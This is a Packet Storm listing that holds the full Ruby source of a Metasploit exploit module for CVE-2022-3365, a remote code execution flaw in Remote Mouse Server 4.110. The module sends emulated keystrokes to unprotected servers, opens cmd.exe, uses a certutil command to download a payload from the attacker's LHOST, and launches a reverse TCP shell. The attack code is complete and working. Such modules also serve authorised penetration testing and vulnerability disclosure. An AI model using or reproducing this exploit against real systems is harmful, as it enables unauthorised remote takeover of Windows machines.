

Remote Mouse 4.110 Remote Code Execution

This Metasploit module utilizes the Remote Mouse Server by Emote Interactive protocol to deploy a payload and run it from the server. This module will only deploy a payload if the server is set without a password (default). Tested against 4.110, current at the time of module writing.

Packet Storm
### This module requires Metasploit: Current source: MetasploitModule < Msf::Exploit::Remote  Rank = NormalRanking  include Exploit::Remote::Tcp  include Exploit::EXE # generate_payload_exe  include Msf::Exploit::Remote::HttpServer::HTML  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Remote Mouse RCE',        'Description' => %q{          This module utilizes the Remote Mouse Server by Emote Interactive protocol          to deploy a payload and run it from the server.  This module will only deploy          a payload if the server is set without a password (default).          Tested against 4.110, current at the time of module writing        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          '0RPHON', # discovery, edb module          'H4rk3nz0' # poc2        ],        'References' => [          [ 'EDB', '46697' ],          [ 'CVE', '2022-3365' ],          [ 'URL', '' ],          [ 'URL', '' ]        ],        'Arch' => [ ARCH_X64, ARCH_X86 ],        'Platform' => 'win',        'Stance' => Msf::Exploit::Stance::Aggressive,        'Targets' => [          ['default', {}],        ],        'DefaultOptions' => {          'PAYLOAD' => 'windows/shell/reverse_tcp'        },        'DisclosureDate' => '2019-04-15',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS] # typing on screen        }      )    )    register_options(      ['RPORT', [true, 'Port Remote Mouse runs on', 1978]),'SLEEP', [true, 'How long to sleep between commands', 1]),'PATH', [true, 'Where to stage payload for pull method', 'c:\\Windows\\Temp\\'])      ]    )  end  def path    return datastore['PATH'] if datastore['PATH'].end_with? '\\'    "#{datastore['PATH']}\\"  end  def key_value(key)    characters = {      'A' => '8[ras]116', 'B' => '8[ras]119', 'C' => '8[ras]118', 'D' => '8[ras]113', 'E' => '8[ras]112',      'F' => '8[ras]115', 'G' => '8[ras]114', 'H' => '8[ras]125', 'I' => '8[ras]124', 'J' => '8[ras]127',      'K' => '8[ras]126', 'L' => '8[ras]121', 'M' => '8[ras]120', 'N' => '8[ras]123', 'O' => '8[ras]122',      'P' => '8[ras]101', 'Q' => '8[ras]100', 'R' => '8[ras]103', 'S' => '8[ras]102', 'T' => '7[ras]97',      'U' => '7[ras]96', 'V' => '7[ras]99', 'W' => '7[ras]98', 'X' => '8[ras]109', 'Y' => '8[ras]108',      'Z' => '8[ras]111',      'a' => '7[ras]84', 'b' => '7[ras]87', 'c' => '7[ras]86', 'd' => '7[ras]81', 'e' => '7[ras]80',      'f' => '7[ras]83', 'g' => '7[ras]82', 'h' => '7[ras]93', 'i' => '7[ras]92', 'j' => '7[ras]95',      'k' => '7[ras]94', 'l' => '7[ras]89', 'm' => '7[ras]88', 'n' => '7[ras]91', 'o' => '7[ras]90',      'p' => '7[ras]69', 'q' => '7[ras]68', 'r' => '7[ras]71', 's' => '7[ras]70', 't' => '7[ras]65',      'u' => '7[ras]64', 'v' => '7[ras]67', 'w' => '7[ras]66', 'x' => '7[ras]77', 'y' => '7[ras]76',      'z' => '7[ras]79',      '1' => '6[ras]4', '2' => '6[ras]7', '3' => '6[ras]6', '4' => '6[ras]1', '5' => '6[ras]0',      '6' => '6[ras]3', '7' => '6[ras]2', '8' => '7[ras]13', '9' => '7[ras]12', '0' => '6[ras]5',      "\n" => '3RTN', "\b" => '3BAS', ' ' => '7[ras]21',      '+' => '7[ras]30', '=' => '6[ras]8', '/' => '7[ras]26', '_' => '8[ras]106', '<' => '6[ras]9',      '>' => '7[ras]11', '[' => '8[ras]110', ']' => '8[ras]104', '!' => '7[ras]20', '@' => '8[ras]117',      '#' => '7[ras]22', '$' => '7[ras]17', '%' => '7[ras]16', '^' => '8[ras]107', '&' => '7[ras]19',      '*' => '7[ras]31', '(' => '7[ras]29', ')' => '7[ras]28', '-' => '7[ras]24', "'" => '7[ras]18',      '"' => '7[ras]23', ':' => '7[ras]15', ';' => '7[ras]14', '?' => '7[ras]10', '`' => '7[ras]85',      '~' => '7[ras]75', '\\' => '8[ras]105', '|' => '7[ras]73', '{' => '7[ras]78', '}' => '7[ras]72',      ',' => '7[ras]25', '.' => '7[ras]27'    }    "key  #{characters[key]}"  end  def windows_key    'key  3cmd'  end  def check    connect    response = sock.get_once    disconnect    if response.include?('SIN 15win nop nop')      splits = response.split(' ')      return CheckCode::Appears("Received handshake with version: #{splits.last}")    end    CheckCode::Unknown('Invalid response from target')  end  def send_command(command)    if command == windows_key      sock.put(command)    elsif (command == "\n") || (command == "\b") # dont split this up      sock.put(key_value(c))    else      command.each_char do |c|        sock.put(key_value(c))      end      sock.put(key_value("\n"))    end    sleep(datastore['SLEEP'])  end  def on_request_uri(cli, _req)    p = generate_payload_exe    send_response(cli, p)    print_good("Payload request received, sending #{p.length} bytes of payload for staging")  end  def exploit    connect    print_status('Connecting')    print_status('Sending Windows key')    send_command(windows_key)    print_status('Opening command prompt')    send_command('cmd.exe')    send_command('') #    print_status('Sending stager')    filename = Rex::Text.rand_text_alphanumeric(rand(8..17)) + '.exe'    register_file_for_cleanup("#{path}#{filename}")    # I attempted to put this all in one, stage, run, exit, but it was never successful, so we'll keep it in 2    stager = "certutil.exe -urlcache -f http://#{datastore['lhost']}:#{datastore['SRVPORT']}/ #{path}#{filename}"    start_service('Path' => '/') # start webserver    send_command(stager)    send_command('') #    print_status('Executing payload')    send_command("#{path}#{filename} && exit")    send_command('') #    handler    disconnect    sleep(datastore['SLEEP'] * 2) # give time for it to do its thing before we revert  endend

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